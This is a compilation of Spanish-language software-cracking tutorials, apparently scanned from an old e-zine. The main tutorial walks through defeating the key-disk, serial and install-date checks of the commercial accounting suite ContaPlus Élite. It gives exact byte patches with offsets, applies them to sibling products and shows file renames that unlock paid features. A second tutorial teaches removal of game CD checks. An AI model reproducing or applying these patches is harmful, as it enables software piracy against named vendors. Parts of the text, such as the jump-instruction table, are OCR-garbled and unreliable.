correcto, cambiemos el color ''d esp+8" Y pasamos de "FFFF00" a "FFFFFF". 
Obtenemos un bonito color blanco de fondo. Luego hemos pillado la llamada correcta. Un par de £12 después obsevamos 


:460a15 cmp [ESI+378],43CA 


Si los valores no son iguales vemos el mensaje de error. Por tanto es este el flag que controla todo. Ya sólo basta ver quien lo 
inicializa. Pero este es un trabajo conocido por todos que lo dejo como ejercicio. 


Fijaos como no se utiliza un clásico flag 1,0 sino un valor difícil 0x43CA. Un nuevo síntoma de que el autor ha leido sobre cracks. 


CONCLUSIÓN 


Hemos aprendido una nueva técnica: ''Color Crack". Es recomendable que se aplique cuando el mensaje de ''unregistered "no sea 
una ventana sino una cadena dentro de una ventana. 
Debemos averiguar el color que se aplica al mensaje y colocar en el Sice: 


bpx nombreRutina if (*(esp+8)==00BBGGRR) 
Recordad que los valores de Blue(azul),Green (Verde) , Red (rojo) están hexa. 


Cuando apararezcamos en el Sice cambiar el color para ver si estamos en la ventana correcta. En tal caso buscar un salto que evite 
el mesaje. 


Este técnica siempre es aplicable, pero se recomienda que se utulize cuando existan pocos colores en la ventana y el mensaje esté 
resaltado del resto (cosa bastante habitual). 


Una posible generalización de está técina es aplicable al color del tipo de letra (foregroundcolor), el tipo de fuente, (setFont), el 
aspecto (cursiva ...). Recordad de echar mano de una buena ayuda Api para win32. 


No olvidemos el esquema de protección tan original de SEPARACIÓN DE COMPROBACIONES que ha implementado el autor. 
Realmente interesante, si señor. 


Notas para los lectores. 


” A 


1.- Los mensajes del tipo ''Hazme el crack para ....”, ''Dime como se crackea....'', ''Dime donde puedo encontrar...'' son 
automáticamente ignorados. El objetivo de estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo 
saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Estado+Porcino 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcinoO hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 
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JUGUETEANDO 


PD PARA EL PROGRAMADOR 


INTRODUCCION 


Victima: CONTAPLUS ÉLITE PYME 
Site: WWw.gruposp.com 
HERRAMIENTAS: 


Desensamblador. Por ejemplo w32dasm 
Editor hexadecimal. Por ejemplo uedit 
Paciencia y Confianza. 


Saludos familia. Aprovecho los ratos para escribir algunas cosillas. 

En esta ocasión acometemos uns joyita con Discos llave, Números de serie,encriptación, 
descompresión en tiempo de ejecución y misterios insondables. 

Un dulce para pasar el rato. 


Llegó a mis manos una petición de crack. Normalmente la desestimo, a menos que la pida 
un amigo, me interese o favorezca mi entorno de trabajo. 

Es mejor enseñar a crakear que enseñar a llorar para suplicar. 

En fin, toda esa filosofía expuesta por +ORC y reescrita por E+P. Son las 8:00 de la mañana 
y me he pasado toda la noche crakeando. 

Si señor, hay pocos placeres comparables. 

Los crackers me entenderán perfectamente de lo que les hablo:-). 

El peluo maulla desesperao y la gorda duerme a mi lado. 

A veces la vida te sonríe y no sabes porqué.Aprovéchala antes de que cambie. 


En este entorno , nada se puede resistir... 


AL ATAQUEEEEEEE 


Miremos nuestro producto. Se trata de un clásico de la facturación española. Contaplus 
Pyme Elite Otoño 98 del 1-11-98 
Un paquete en formato CD que se compone de: 


ContaPlus 

FacturaPlus 

NominaPlus 

PersonalPlus 

Utilidades (Antivirus Norton, Antivirus Mcafee, Sidekick y PC Anywhere) 


La web la tenemos en WWww.gruposp.com. 
Despendolemos un ratico por su web a ver a cuanto tienen el timo. 


Uhmm 2 millones de ventas y nuestro producto 165.000 pelas, !!! 


Precio especial !!!! 
Joer, pos si que, pa una urgencia, vamos. 
Se merecen que lo crackeen, si señor. 


PROTECCIONES ESPAÑOLAS 


A primera vista, el programa es español y por tanto la protección también. Conociendo los 
antecedentes de protecciones españolas, estimo que estará roto en 5 minutos. Sólo recuerdo 
una protección española cojonuda. Era de un catalán y se la había puesto a su programa de 
rompecabezas. Si sería buena que fue uno de los ''coladores''para la +HCU con +ORC y 
+Fravia(a ver si se recupera pronto, leñe) 


PRIMERA APROXIMACION Y PRIMER ENFADO 


Empezamos mal, intentamos instalar el contaplus y nos pide un disquete llave. Joder, ¿no 
habían pasado al olvido esas protecciones basadas en discos llave?. ¿Es que no aprenden?. 
Los discos llave fueron desechados porque 

no eran fiables, se podían cascar en el trayecto de la fábrica al usuario y luego vete a reclamar 
al maestro armero una vez que has pagado el producto, eso sin contar 

el tiempo de espera del nuevo disquete, y que el que te manden no esté roto. 

Para colmo, estos discos se formatean a medida por lo que no se pueden 

copiar (en general) ni siquiera para sacar una triste copia de seguridad. 

Como veis, una mierda, y los del CONTAPUS dale que dale. 


OBJETIVOS 


Estan claros, cepillarse al CONTAPLUS y obviar el disco llave. 
Pero conseguiremos bastantes cositas más. 


SEGUNDA APROXIMA CION Y SEGUNDA OSTIA. LAS COSAS SE COMPLICAN 


Si intentamos instalar sin disco llave nos aparece una estúpida ventana: 
"Inserte disco llave, Por favor retire el disco actual y bla,bla,bla" 

La ventanita tiene pinta de dialogbox, así que nos vamos al Softlce y ponemos 
unas bonitas trampas para osos. 


bpx dialogbox 
bpx dialogboxparama 


Lanzamos al niño y el que pica es el bpx dialogboxparama. 

Con f12 aparece la ventana de error, pulsamos NO y caemos en kernel!alloc. 
Ostias que feo. F12 antes pa asomar el pescuezo en 

:10012739 dentro del proceso -GLCO000x. (la x es variable). 


Ostias, que mierda es esta, ¿dónde está es fichero ese tan raro?. 
En el directorio del conta no, seguro. 
¿Pero entonces dónde?. Si buscamos el ficherito no está en el disco duro. 


Entonces, ¡por la madre de MITRA!, ¿que coño pasa?. 
Pensad una posible solución antes de pasar al siguiente párrafo, que os van a salir almorranas 
cerebrales. 


LA SOLUCIÓN A LA PELUA CUESTIÓN 


Pos si, seguro que ya lo habeis acertado :-) 

El puto fichero se crea en tiempo de ejecución y se borra antes salir. 

Por eso no aparece en el directorio de instalación ni en el disco duro al finalizar. 

Pero entonces, segunda e importante cuestión: 

¿como mangonearemos si se genera en tiempo de ejecución? 

Es vital poder toquetear para saltarse la protección. 

Así pues, relegamos el estudio del 

para centrarnos en como se puede modificar un fichero que se crea en tiempo de ejecución. 


MODIFICACIÓN DE FICHEROS CREADOS EN TIEMPO DE EJECUCIÓN 


Las variantes que se me ocuren de menos a más elegantes son: 


1 Entender como se crea el fichero y retocarlo antes de que se cree. 

2 Parchearlo en memoria una vez creado 

- mediante un parche en tiempo de ejecución. 

- Aplicando ingeniería inversa para localizar y redirigir un trozo de código 

inútil dentro del ejecutable y que parchee el fichero. 

3 Dejar que se cree en memoria pero redirigirlo a un fichero en disco ya retocado. 


Recuerdo cierta protección del mismo tipo en el Hotmetal 4.0. antes que los encerraran en la 
inutilidad del vbox. 


INTENTO SER UN TIO ELEGANTE, PERO NO ESTÚPIDO - 
Pues eso, intento ser un tio elegante y opto por la primera opción y descubro lo siguiente: 


* Dentro del fichero instalar.exe del contaplus reside el famoso -GLC000x. 

En tiempo de ejecución se lee un trozo del fichero instalar.exe, se marea un poco y se 
construye el nuevo fichero. 

El nombre se construye a partir de una cadena constante :-GLC% 04x.tmp. 

Podeis abrir el fichero instalar.exe y cambiar el nombre por algo más decente. 

Tengo destripado y pasado a C el algoritmo que extrae del fichero instalar.exe los bytes, los 
marea un poco y los escribe en el -GLC%.04x.tmp. 

Si quereis más datos del algoritmo mandadme un mail. 


* Me quedaba la duda de si el autor de la protección había encriptado, comprimido o 
encriptado/comprimido. 

La respuesta es sólo comprimido siguiendo un complicado algoritmo que tengo casi 
analizado. 

Asi pues sólo queda otra semana para crear un compresor (el descompresor ya lo tengo, está 
en el propio programa). 


* Como la cosa se complicaba, deseche esta vía y me fui a la opción 2. 
Pronto la desistimé porque no sabía cuantos parches tenía que aplicar. 


Así pués, me fui a la vía 3. Ya sé, ya sé, es la más cutre, pero rula :-) 


CAER EN LA CUENTA 


Concurrida audiencia, por si no os habeis dado cuenta, la protección es muy buena. 
RESPETAD AL PROGRAMADOR que se ha entretenido en comprimir sus datos 
y descomprimirlos en tiempo de ejecución. 

Buen trabajo BBYYMMAARRCCOOSS. 

Quizás no esté todo perdido dentro del panorama de programadores españoles. 
Aupa muchachos!!! 


'OPCION 3 CAÑERA 


Lo primero es pillar una copia chachi del -GLC%04x.tmp pa poder 

modificarla tranquilamente y después regirigir el programa para que cargue nuestra dll y no la que ha creado. 
Para ello, lanzamos el instalar y aparece la venta de error con "si'' y no”. 

Nos vamos al explorador de Windows con la teclilla nueva con el logo del windoze 

(ostias, pero si sirve pa algo y to), o bien lo abrimos antes que el instalar y conmutamos con ALT+TAB. 
Estamos seguros que el fichero debe de existir porque aún no ha acabado el programa (nos da la opción de continuar 
si pusamos "'si''). 

Buscamos en el explorador los ficheros que empiezen por -GLC y bingo, 

lo tenemos en c:1windows. Con mucho cuidado lo copiamos y lo pegamos en un sitio seguro. 

Nuestra cena ya está en la red :-=). 

Para los descuidados como yo, habilitarle la opción de sólo lectura con el botón derecho 

del ratón y propiedades. Sino lo perderemos cuando lo utilizemos. 

Recordad quitarle lo de sólo lectura para parchearlo. 


Do quiera que un fichero se cargue en memoria y se ejecute en tiempo de ejecución este debe ser una dll. 

Ya sé, ya sé, no tiene extendión dll ni ná, pero no es necesario. 

Para que un fichero sea considerado dll basta con tener nombre y extensión, y la constante -GLC %04x.tmp lo 
cumple. 

Por tanto, instalar debe cargarlo como librería. Si lo desensamblamos, vemos que usa la función del api 
KERNEL232.LoadLibraryA y además sólo una vez. 


:004024F7 740A je 00402503 
:004024F9 E87E060000 call 00402B7C 
:004024FE E9BDO00000 jmp 004025C0 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004024F7 (C) 


:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FEFFFFEES] 
:00402509 50 push eax; Nombre churro de la librería -GLC%04x.tmp 


* Reference To: KERNEL32.LoadLibraryA, Ord: 0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


Ahora hay que aplicar un poco de ingeniería inversa para transformar y que cargue siempre nuestra librería 
retocada. Os ahorro el proceso mental y obtenemos después de verificar que nunca se pasa por :004024F9 (con un bpx 
por ejemplo) 


:004024F7 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES];Dirección del nombre de la dll a cargar 


:004024FD C700432E6100 mov dword ptr [eax], 00612E43 ¡Constante .a0 y aprovechamos la c inicial 
de [eax] nos queda c.a 

:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES];Guardamos las modificaciones. 

:00402509 50 push eax 


* Reference To: KERNEL32.LoadLibraryA, Ord: 0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


¡Con esto siempre se carga la librería 'c.a''. Así pues renombramos la -GLC %04x.tmp que habiamos pescado antes 
como 'c.a''. Ya sé, el nombre es un poco cutre, pero si no os gusta retocarlo vosotros. No se os olvide indicar que es de 
sólo lectura si no lo queréis perder. Si repetimos lo del bpx dialogboxparama aparecemos en el proceso C!text 
(nuestro fichero c.a). Vamos por el buen camino. To este rollo pa redirigir un puto fichero, la protección debe ser la 
ostia. Estoy ansioso :-) Resumiendo, buscamos en el instalar.exe 74 OA ES 7E 06 00 00 y lo encontramos en 0x18F7 y 
cambiamos por 8D 85 ES FE FF FF C7 00 43 2E 61 00 


VUELTA A LA PROTECCIÓN 


Ya podemos mangonear tranquilos nuestro C.a. 

Ahora hay que localizar donde se llama al disco llave y neutralizarlo. 

Los accesos al disco se pueden hacer de forma cutre y a alto nivel con "deviceiocontrol” 

o bien usando las interrupciones a pelo. Como podeis sospechar, se han usado los deviceiocontrol. 
Si en el softlce ponemos un bpx deviceiocontrol aparecemos en una dll mu fea GLfxxxx.tmp. 
Esto suena al mismo truquillo de descompresión en tipo de ejecución. 

Si pusamos unas 2() veces £12 reaparecemos en nuestra querida c.a 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C call [ebp+0C] ¡Llamada a la feisima glfxxxx.tmp 
:1001524E E93C010000 Jjmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C Call [ebp+0C] ¡2% Llamada 


Os ahorro el trabajo y os comento como funciona el esquema de protección a este nivel. Se crean 2 dll en tiempo de 
ejecución en el mismo estilo que ya hemos comentado. Estas dll se encargan de todo el acceso al disco llave. Los 
parámetros a las dll se pasan (agarraos) en cadenas ascii. Basta con poner un bpx 1001524B y echar un vistazo a esi y 
edi. Obtendremos parámetros del tipo 3HayDisco 3Esdisco 3Instalaciones 


ESTÚPIDO VELO 


Corramos un estúpido velo en esta parte de la protección, porque es la más patética. 
Baste decir dos cosas, para anular completamente al disco hay que parchear :1001524B. 
En :1001524B se comprueba que existe disco, que el disco tiene el formato adecuado, 

se leen el número de licencias . 

Si existe algún error devuelven en eax=0, sino devuelven eax=1 

Así pues cambiamos 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C Call [ebp+0C] 

:1001524E E93C010000 jmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C call [ebp+0C] ¡2% Llamada 
Por 

:1001524B 33 CO xor eax, eax 

:1001524D 40 inc eax 

:1001524E E93C010000 jmp 1001538F 

:10015253 33 CO xor eax,eax 

:10015255 33 CO xor eax,eax 

:10015257 40 inc eax 

:10015257 90 nop 


Buscamos FF 24 85 8E 54 01 10 en c.a y lo encontramos en 0x1464B donde ponemos 33 C0 40 E9 3C 01 00 00 33 CO 33 
C0 40 90 Con esto quedan fulminados los accesos a disco. Si seguimos adelante nos pide un número de serie que se 


puede obviar si parcheamos en 


:1001525E FF75B8 push [ebp-48] 
:10015261 FF75B4 push [ebp-4C] 
:10015264 FF550C Call [ebp+0C]; eax=0 si todo va bien. 
:10015267 E923010000 jmp 1001538F 
por 

1:1001525E 33C0 xor eax, eax 
:10015260 33C0 xor eax, eax 
1:10015262 33C0 xor eax, eax 
1:10015264 33C0 xor eax, eax 
:10015266 90 nop 

:10015267 E923010000 jmp 1001538F 


Si no parcheamos los push el programa casca. Resumiendo, buscamos en c.a ff 75 b8 ff 75 b4 ff 55 0C E9 23 01 00 00 y 
lo encontramos en 0x1465E, cambiándolo por 33 c0 33 c0 33 c0 33 c0 90 Cuando pida el serial podemos introducir 
cualquier churro numérico p.e: 111-1-696969-11 En el nombre de la empresa y nombre del usuario introducimos más 
de dos caracteres. Curiosamente todas estas rutinas GLC de acceso a disco y check del serial, aparecen como una dll 
normal spptr.dll en el directorio de instalación. Para qué, mu sencillo, para deinstalar y eliminar una licencia del disco 
llave. En teoría hay un número límite de instalaciones, cada vez que se instala el programa se elimina una licencia del 
disco llave y cada vez que se desistala se añade una. ¿ÉXITO? Si seguimos todos los pasos, la instalación finaliza 
correctamente . Ávidos lanzamos el programa y crash.'' Aplicación instalada incorrectamente". ¿En qué nos hemos 
equivocado?. Pensad un poco. 


SOLUCIONES VIABLES 


Seguro que habéis llegado a la misma conclusión que yo. 

Las rutinas de manejo de disco que hemos inutilizado, dejaban algun flag en algún sitio 
que indicara que el programa estaba bien instalado. 

Así pues hay quedan dos opciones: 


1 Saltar la comprobación en el programa principal. 
2 Activar ese flag. 


HORROR Y ESPANTO 


Seleccionando la opción 1 nos encontramos en un avispero. 

¡El progrma principal está hecho en CLIPPER. 

Qué horror, aún se siguen usando esas herramientas del demonio. 

¡Si queréis pasarlo realmente mál intendad, trazar un programa en clipper. 

¡El control se realiza por bucles 

de salto del tipo call[ax+4] que conducen a otros bucles de salto call [ebx+6], hasta el inifito. 
Todo está dirigido por tabla y en código de 16bits. 

Osea nada de usar la potencia de los registros de 32 bits. 

Una montaña de mierda, como podreis observar. 

Nada recomendabe ni saludable. 

Optamos por la opción 2. Para eso llamamos a nuestro amigo y le pedimos que nos comprima 
el CONTAPLUS (bien instalado) en 

disquetes para compararlo con el que tenemos. Busque las diferencias. 


EL MISTERIO INSONDABLE 


Si descomprimimos el CONTAPLUS bien instalado en nuestro disco duro nos llevamos 
una desagradable sorpresa. "Aplicación mal instalada". 

Joder, que coño pasa, pero si lo hemos copiado de uno que estaba bien instalado. 

A ver, a lo mejor accede al registro del sistema buscando algo raro. 

Lanzamos el regmon y vemos que la aplicación accede pero busca cosas nada importantes. 
Podréis pensar, bueno quizás busque un fichero extraño que no hayamos copiado. 
Lanzamos en filemon y sólo accede al win.ini fuera de su directorio. 

Miramos el win.ini y no vemos nada sospechoso. 


¿To esto está mu bien, pero que coño mira para saber que no está bien instalado? 


Este es el misterio insondable que me ha tenido la noche en velo y que me ha hecho disfrutar 
como un enano cabezón. Pero hay más, si copiamos el directorio de instalación en el disco duro 
donde se instaló originalmnte, el programa deja de funcionar. 

Quedan eliminados los flags en el registro del sistema y el acceso a ficheros raros, 

como ya suponíamos. Y el colmo, si copiamos y pegamos el ejecutable en el directorio de 
instalación del disco duro original de instalación el jodio programa funciona con el 

ejecutable original, pero no con la copia. ¿es mágia? 

¿hay una explicación razonable o estamos ante un expediente X ? 


Pensad el problema antes de mirad la solución, es apasionante. 
Centraos en lo extraño que es que funcione con el ejecutable original 
y no con la copia, cuando son los mismos ficheros. 


EL EXPEDIENTE X DESVIRGADO 


Lo más curioso de todo es que el programa funciona con el ejecutable original, pero no con la copia. 

En principio, esto no tiene sentido, a menos, claro está que exista una diferencia entre el original y el copiado. 
Exactamente, la fecha de creación. 

Para comprobarlo retrasé el reloj del windoze hasta la fecha hora y minuto en el que se había 

construido el ejecutable original. 


En ese preciso momento realizé una copia del origial y BINGO, la copia del ejecutable funcionaba. 

Ya hemos encontrado el flag, pero hace falta saber donde se guarda. 

En el registro del sistema no, porque no realiza ninguna operación extraña. 

Puede guardarlo en algún campo de la base de datos , osea en los fichero dbf. Para eliminar esta opción copie todos los 
ficheros 

(excepto el ejecutable) de nuestro CUENTAPLUS al directorio original, y seguia funcionando. 

En conclusión, el flag está dentro del propio ejecutable. 

Para comprobarlo, comparé el ejecutable original y el nuestro y he aquí las diferencias : 


FileSize: 2FA780h 
DD 2F2726h 
¡DB Ch 
DB 7Fh 
DD 2F2727h 
DB A2Zh 
DB Clh 
DD 2F272Dh 
DB 9Dh 
¡DB 3Dh 
DD 2F272Eh 
DB 54h 
DB 79h 


Cambian 4 posiciones de memoria de un ejecutable a otro. Así pues una de las rutinas de acceso a disco que hemos 


desabilitado introduce en el ejecutable final la fecha de creación. Para más inri, esta fecha está encriptada y la llave de 
la desencriptación es BBYYMMAARRCCOOSS. Estos programadores nuncan aprenderán a ser humildes, los muy 
¡jodidos. Si cazamos las dll de disco que hemos anulado (copiar y pegar como ya vimos) y desensamblamos, 
observamos que se utiliza una bonita función: DosDateTimeToFileTime function converts MS-DOS date and time 
values to a 64-bit file time. 


BOOL DosDateTimeToFileTime ( 


WORD wFatDate, // 16-bit MS-DOS date 
WORD wFatTime, // 16-bit MS-DOS time 
LPFILETIME 1pFileTime // address of buffer for 64-bit file time 


); 


Ponemos un bpx DosDateTimeToFileTime y lanzamos el contaplus. EUREKA, aparecemos en spptr.dll, un par de £12 
más y volvemos a al ejecutable original. No os aburriré indicando como localizar la rutina de comprobación del flag 
(ya somos mayorcitos), doy directamente el parche: 


Cambiamos 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 52 push edx 

Por 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 51 push ecx ; BBYYMMAARRCCOOSS 


Buscamos en spptr.dll 8d 54 24 28 51 52 lo encontramos en 0x154A y lo cambiamos por 51 Listo y a disfrutar. Ya es 
hora de volver con la gorda y el peluo para tomar una cerveza. 


JUGUETEANDO 


*Existe una forma alternativa de corregir el problema de aplicación mal instalada. Si cogemos un dbf cualquiera del 
directorio /emp y lo copiamos con el nombre menumode.dbf , entramos en la aplicación pero en versión demostrativa, 
sin copias de seguridad y sin algunas opciones más. 


* Para convertir las copias de seguridad a la versión profesional, cambiad el nombre del fichero /emp/versione.dbf por 
/emp/versionp.dbf y /emp/menuwine.dbf /emp/menuwin.dbf . 

Esto provoca un pequeño error al mirar el ''Acerca de'' en el CONTAPLUS, pero no tiene mayor importancia. 
Sospecho que con una poyada de estas más podemos pasar del CONTAPLUS élite al profesional, pero no he dado con 
la tecla. 


* Podemos copiar impunemente el directorio del CUENTAPLUS de un disco duro a otro sin necesidad de reinstalar. 


* Este mismo proceso es aplicable al NOMINAPLUS y FACTURAPLUS y el resto del paquete y muy probablemente 
al resto de productos de la empresa SP. El TVPPLUS está cascado (por lo menos en el cd) por lo que no se ha podido 
probar y el PersonalPlus no necesita retoques. PAra el resto de componenetes del paquete, simplemente se parchea el 
instalar.exe, y se copia el c.a del CONTAPLUS y se comienza la instalación. Una vez instalado, se copia el spptr.dll del 
contaplus en el directorio apropiado para cada producto (NOMINAPLUS: /exe) (FACTURAPLUS: /exe) 


* Para pasar una version demostrativa (o educativa) a versión élite, basta con aplicar el parche al spprt.dll y borrar el 
fichro /emp/menumode.dbf 


PD PARA EL PROGRAMADOR 


Querido Marco: 


Has construido una buena protección. 

He estado tentado de guardarme el crack por respeto. 

Pero lo que me decidió fue la decepción de ver como usabas Clipper y tu forma relajada de 
acceder al disco mediante deviceiocontrol. 

La próxima vez esmérate un poco más, aunque he de reconocer que he disfrutado con tu 
protección en grande. 


Notas para los lectores. 


1.- Los mensajes del tipo "Hazme el crack para ....', ''Dime como se crackea....'', ''Dime 

3 
donde puedo encontrar...'' son automáticamente ignorados. El objetivo de estos artículos es 
enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten 
la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Estado+Porcino 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino Chotmail.com 


Recordad bebed de la fuente, buscad a +ORC en la red. 


Programa: Tutorial sobre CD Check 


PROTECCION: CD Check 
Dificultad: Principiante 
Herramientas: W32DASM, y Editor Hexadecimal 


CRACKER: Dek_Oin 


FECHA: 31/08/2000 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en 


Castellano, sobre Ingenieria Inversa y Programacion. Email "Colabora con tus 
Proyectos" 


INTRODUCCIÓN 
Hola!!! 


¿Como les va?. Los vuelvo a encontrar en mi tercer tutorial (que bien 
contaditos que los tengo, hehe). Como dije, digo, y voy a seguir diciendo, 
si algo no queda bien explicado o ustedes no entienden algo, mándenme un 
mail a dek_oinfthotmail.com. Supongo que todos ustedes tienen un juego que no 


nos permite jugar sin insertar el CD ROM. Los CD's se rayan de tanto 
ponerlos y sacarlos y además es incómodo hacerlo. En este tutorial 
aprenderán algunas maneras de crackear el CD-check. 


Si un amigo tuyo tiene un juego y tu lo quieres, no necesitas copiar el CD, 
¿pero el juego solo anda con el CD, como hago para jugar si no lo tengo?, 
fácil, puedes crackear el CD check y funcionará sin el CD. 

OK, aquí, las herramientas que necesitas para empezar: 


W32Dasm8.9  ———>Desensamblador 

Hiew, Ultraedit, o Hex Workshop ---> Editores Hexadecimales 

(todas estas herramientas y muchas más las pueden encontrar en la página de 
karpoff) 


Pienso que al principio no necesitarán Soft Ice(depurador), tendrán que 
saber algo del código ASM primero y ahí podrán usar el famoso 

depurador (aunque el trw2000 también está buenísimo y a mi me parece que es 
igual que el SoftlIce). 


Bueno, lo más importante ya que sin esto no podrán hacer nada, necesitarán 
un Juego para crackear. Al principio usen un juego de solo un CD para no 
complicarnos las cosas. 


AL ATAKE 


CD-Cracking, es la manera de crackear un juego que necesita el CD para 
iniciarse(porque a los programadores se les ocurrió así, jJeJe). 

Hay muchas maneras de crackearlo pero estas son las más recomendables: 

1)En primer lugar, instalen la mayor configuración disponible del juego y si 
es necesario, copien archivos a su disco duro. Ejecuten el juego sin el CD 
la unidad y verán el mensaje de “Please insert the CD to play” o “You need 
the CD to play", etc. 


Bien, se lo memorizan y si sufren el Mal de Alzheimer, amnesia u otra 
enfermedad que les haga perder la memoria, lo anotan (¿que pesimista no?). 
Vayan al 0W32Dasm (supongo que ya tienen la copia de seguridad del 
ejecutable), abran el exe del juego que quieran crackear, y lo 
desensamblan. 


Ahora hagan clic en el botón en String References y busca el mensage de 
error y haz doble clic varias veces para ver cuantas referencias hay sobre 
él. 

Ahora están situados en la rutina de comprobación del CD ROM. 


Pero al principio, repasemos un poco los saltos del código ASM: 


Ensamblador Que significa 


alta si no es igual 


ne 


u. 
(6) 


alta si es igual 


m alta directamente a..... 


LO) 
17) 


uu. 
0) 
0) 


a] 
Pp 
5 

Q 
E 
a 
hh 
c 
5 
Q 
.- 
O 
5 
p 
3 
Pp 
0) 
5 
= 
O 


(No OPeration) 


[a] 


op 


alta si es superior 


un 


n alta si no superior 


alta si es superior o igual 


u 


alta si no está sobre o igual 


[o 
7) 


uu. a.]pu.-Jf au. 
a 0 
o op 
0) 
(9) 


alta si está debajo 


nb alta si no está debajo 


Qu. 
(6) 


alta si está debajo o igual 


Qu: 
o 
(0) 
un 


alta si no está debajo o igual 


un 


un 


alta si es mayor 


n alta si no es mayor 


“QQ 
| 


alta si es mayor o igual 


alta si no es mayor o igual 


(0) 


alta si es menor 


-]pa-]pa-]pa-]pa.]pa-]pa- 

RI 5sfpua QS 
aQ|| o O 
(0) (0) 
| 


alta si no es menor 


ul 
ja] 
E 
un 


altan si es menor o igual 


un 


altan si no es menor o igual 


aupa. 
sl FP. 
RIO 
0) 
(0) 


¡OK! ¿Lo sabes? 

Fantástico!!!, ahora busca una Call arriba del mensaje, no siempre están 
arriba del mensaje de error, pero mayormente si. Si no funciona, busquen la 
próxima call. 

Vamos a nopearlts(la AQ la pongo por que no sé que es lo que van a nopear, si 
es una Call, un salto, varios saltos, etc.) (909090... ¿entienden?). Abran el 
Hex Workshop, hagan clic en edit / goto y escriban el offset de lo que 
deseen parchear SIN _ LOS CEROS (SON PARA QUE ENTIENDA EL DESENSAMBLADOR) Y SIN 


LA h(SIGNIFICA QUE ESTÁ EN HEXADECIMAL). 


54-FB-A7-9C-01 <--- este número sería 5 bytes(los bytes se cuentan de 2 en 
2). Sólo cambien el número en: 
90-90-90-90-90 <--—- el número nopeado. Cuando una Call "llame a esta 


dirección de memoria, el procesador no hará nada, por lo tanto el juego no 
podrá mostrar el mensaje de error. Si la línea salta para abajo cuando están 
escribiendo los 90, que no cunda el pánico, sigan poniendo 90 hasta que 
lleguen al número de cifras que tiene la call o el salto que quieran 
parchear (No sé si me explico, Ejemplo: Salto condicional = 74FB. Si la línea 
baja, sigan escribiendo 90 hasta llegar a 4 que son las cifras que tiene el 
salto 7-4-F-B). Guarden los cambios en el ejecutable y prueben el juego. 
Felicidades!!!! Ya pueden divertirse sin insertar su CD ROM!!!!! 


2)A veces el juego sabe que la rutina de comprobación del CD fue nopeada. Así que 
tendremos que hacer que el juego crea que tiene el CD en la unidad. 


Simplemente hagan igual que antes, pero ahora no lo nopeen, tienen que 
escribir esto: B8010000000<----- para una call de 5 bytes(son diez cifras). 


Pero, ¿qué hice? El juego verifica en el registro eax si el CD está puesto. 
Si leiste mi tutorial desde cero, recordarás que l=verdadero y O=falso, o 
sea que si es 0 quiere decir que saltará al mensaje de error, si es 1, 
significa que el CD está puesto. Guarden los cambios. ¿Funciona? No, 
entonces prueben la siguiente manera. (Felicidades si les funcionó!!!!) 


3) Simplemente abran el W32Dasm y busquen algún salto como je o jne arriba 
del mensaje de error. Cuando lo encontraron, cámbienlo por el opuesto. 


75 (jne) a 74 (Je), un 
0F85  (jne) a 0F84 (jne), un 
74 (Je) a 75 (jne) o un 
org4 (je) a 0F85 (jne) 


¡Ahora debe funcionar! 
¿No? No se preocupen probemos la última posibilidad (que pienso que es la más 
común). 
4) Abran el W32Dasm, haz clic en el botón de “Exported Functions” y busca una 
línea(la función utilizada por el 99% de los juegos) “GetDriveTypeaA” (también 
están estas otras: 

-=  GetVolumelnformationA 

- GetDriveAttributeA 

- FindFirstFileA 

- SetCurrentDirectoryA 
- GetFileSize 
- CreateFileA 
- GetDiskFreespaceA 
- GetFileAttributeA 
- mciSendCommandA € mciSendStringA (usada para chequear el Audio en el CD) 
Echen un vistazo arriba del “GetDriveTypeA” (también miren debajo pero lo 
más común es que las calls y los saltos se encuentren arriba de 


“GetDriveTypeA”), ¿ven una call?, ¿ven una comparación (cmp) con un 0005? 
(ejemplo) 

00005= CD ROM 

00003= Disco Duro 

Hehe, ¿qué haremos?. Sí!!!!., Cambiaremos 00005 a 00003! Simplemente abre el 
Hex Workshop, edita los bytes cambiando el cmp 00005 a cmp 00003. 
Aquí también pueden cambiar una call o un salto por el opuesto, por los 
famoso 90 o por EB, que en los juegos es muy común. 

OK éstos son las maneras más recomendadas para crackear CD-checks. 

Astalavista 


Nota: este tutorial está creado con fines educacionales. Si un amigo te presta un juego y 
lo crackeas, es para poder observarlo y jugar poco tiempo. El autor no se hace 
responsable de nada!!! 


Como crackear Virtuosa Gold 3.20 a 


Uhmm este objetivo es muy facil!!! 
Vamos al W32Dasm y abrimos el Virtuosa, lo que queremos remover es la molesta NAG que nos dice paguenme, etc. 
